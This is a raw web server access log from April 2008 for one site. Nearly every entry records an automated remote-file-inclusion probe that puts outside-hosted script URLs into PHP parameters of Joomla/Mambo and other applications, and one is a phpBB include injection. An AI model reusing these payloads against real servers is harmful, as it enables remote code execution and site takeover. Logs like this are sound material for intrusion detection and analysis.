87.175.239.19 - - [30/Apr/2008:11:12:14 -0700] "GET /logs/access_080119.log//admin/spaw/spaw_control.class.php?spaw_root=http://rpkns.com/media/idnews.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
87.175.239.19 - - [30/Apr/2008:11:12:15 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://rpkns.com/media/idnews.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:12:16 -0700] "GET /logs/access_080105.log//admin/spaw/spaw_control.class.php?spaw_root=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.175.239.19 - - [30/Apr/2008:11:12:16 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://rpkns.com/media/idnews.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
195.205.214.163 - - [30/Apr/2008:11:12:22 -0700] "GET /logs/config.inc.php?path_escape=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.205.214.163 - - [30/Apr/2008:11:12:23 -0700] "GET /config.inc.php?path_escape=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.175.239.19 - - [30/Apr/2008:11:12:28 -0700] "GET /logs/access_080105.log//admin/spaw/spaw_control.class.php?spaw_root=http://rpkns.com/media/idnews.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
61.63.9.163 - - [30/Apr/2008:11:12:33 -0700] "GET /logs/access_071218.log//spaw_control.class.php?spaw_root=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [30/Apr/2008:11:12:34 -0700] "GET //spaw_control.class.php?spaw_root=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [30/Apr/2008:11:12:38 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
62.240.12.1 - - [30/Apr/2008:11:14:07 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
62.240.12.1 - - [30/Apr/2008:11:14:07 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
221.143.49.246 - - [30/Apr/2008:11:14:56 -0700] "GET /logs/access_071224.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [30/Apr/2008:11:14:56 -0700] "GET /logs/access_071224.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.63.16.134 - - [30/Apr/2008:11:15:03 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://contactcraze.com/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.63.16.134 - - [30/Apr/2008:11:15:03 -0700] "GET //skin/zero_vote/error.php?dir=http://contactcraze.com/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.58.169 - - [30/Apr/2008:11:15:04 -0700] "GET /logs/access_080201.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:11:15:07 -0700] "GET /logs/access.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:15:11 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:11:15:11 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:11:15:12 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45419 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:15:13 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
80.238.208.61 - - [30/Apr/2008:11:15:20 -0700] "GET /logs/access_071219.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.208.61 - - [30/Apr/2008:11:15:20 -0700] "GET /errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.208.61 - - [30/Apr/2008:11:15:21 -0700] "GET /logs/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:11:15:34 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.84.188.7 - - [30/Apr/2008:11:15:34 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:11:15:34 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:11:15:58 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:11:15:59 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:11:15:59 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.82.115.21 - - [30/Apr/2008:11:16:00 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.82.115.21 - - [30/Apr/2008:11:16:00 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.82.115.21 - - [30/Apr/2008:11:16:01 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.82.115.21 - - [30/Apr/2008:11:16:13 -0700] "GET /logs/access_080123.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.chandonai.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
72.36.175.10 - - [30/Apr/2008:11:16:22 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.36.175.10 - - [30/Apr/2008:11:16:22 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.36.175.10 - - [30/Apr/2008:11:16:22 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:11:16:23 -0700] "GET /logs/access_080228.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:11:16:23 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.93.56.80 - - [30/Apr/2008:11:16:30 -0700] "GET /logs/access_080321.log/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://finkel.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [30/Apr/2008:11:16:31 -0700] "GET /plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://finkel.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [30/Apr/2008:11:16:31 -0700] "GET /logs/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://finkel.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.36.175.10 - - [30/Apr/2008:11:16:32 -0700] "GET /logs/access_080123.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:11:16:34 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:11:16:48 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [30/Apr/2008:11:16:53 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [30/Apr/2008:11:16:54 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:17:30 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:17:30 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.9.26 - - [30/Apr/2008:11:17:52 -0700] "GET /logs/access_080226.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:11:17:53 -0700] "GET /logs/access_080304.log/index.php?id=&lang=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [30/Apr/2008:11:17:57 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://odyrt.net/info/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [30/Apr/2008:11:17:58 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://odyrt.net/info/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:11:17:59 -0700] "GET /index.php?id=&lang=http://simoneleitao.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:11:18:02 -0700] "GET /logs/index.php?id=&lang=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:11:18:05 -0700] "GET /logs/access_080223.log/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:11:18:05 -0700] "GET /logs/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.50.53.151 - - [30/Apr/2008:11:18:11 -0700] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [30/Apr/2008:11:18:11 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [30/Apr/2008:11:18:12 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:11:18:14 -0700] "GET /logs/access_080324.log/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.9.163 - - [30/Apr/2008:11:18:14 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [30/Apr/2008:11:18:15 -0700] "GET //ashnews.php?pathtoashnews=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:18:57 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:11:19:10 -0700] "GET /logs/access.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:11:19:14 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:11:19:15 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45419 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:19:22 -0700] "GET /logs/access_080117.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:19:22 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:19:22 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:19:30 -0700] "GET /logs/access_080308.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:11:20:06 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:11:20:06 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:11:20:06 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:11:20:06 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:11:20:06 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:11:20:06 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:11:20:07 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.50.53.151 - - [30/Apr/2008:11:20:07 -0700] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:11:20:07 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:11:20:07 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:11:20:10 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:11:20:15 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.80 - - [30/Apr/2008:11:20:16 -0700] "GET /plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://finkel.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:11:20:21 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:11:20:24 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:11:20:27 -0700] "GET //main.php?sayfa=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:11:20:29 -0700] "GET /logs//main.php?sayfa=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:11:20:38 -0700] "GET /logs/access_080219.log//main.php?sayfa=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:20:50 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:20:51 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:11:20:55 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:11:20:57 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:21:01 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.175.239.19 - - [30/Apr/2008:11:21:05 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://rpkns.com/media/idnews.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
87.175.239.19 - - [30/Apr/2008:11:21:06 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://rpkns.com/media/idnews.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
201.130.79.61 - - [30/Apr/2008:11:21:40 -0700] "GET /logs/access_080108.log/component/com_events/includes/comutils.php?&mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.61 - - [30/Apr/2008:11:21:40 -0700] "GET /component/com_events/includes/comutils.php?&mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.61 - - [30/Apr/2008:11:21:40 -0700] "GET /logs/component/com_events/includes/comutils.php?&mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.50.53.151 - - [30/Apr/2008:11:21:44 -0700] "GET /logs/access_080114.log/convert/mvcw.php?vwar_root=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.166.35.71 - - [30/Apr/2008:11:21:48 -0700] "GET /logs/access_071224.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:21:58 -0700] "GET /logs/access_080309.log//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:21:58 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:21:59 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:11:22:01 -0700] "GET /logs/access_080309.log//newspublish/include.php?path%5Bdocroot%5D=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [30/Apr/2008:11:22:01 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://ucil.110mb.com/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [30/Apr/2008:11:22:04 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [30/Apr/2008:11:22:05 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://ucil.110mb.com/img.jpg? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.167.35 - - [30/Apr/2008:11:22:34 -0700] "GET /logs/access_080226.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
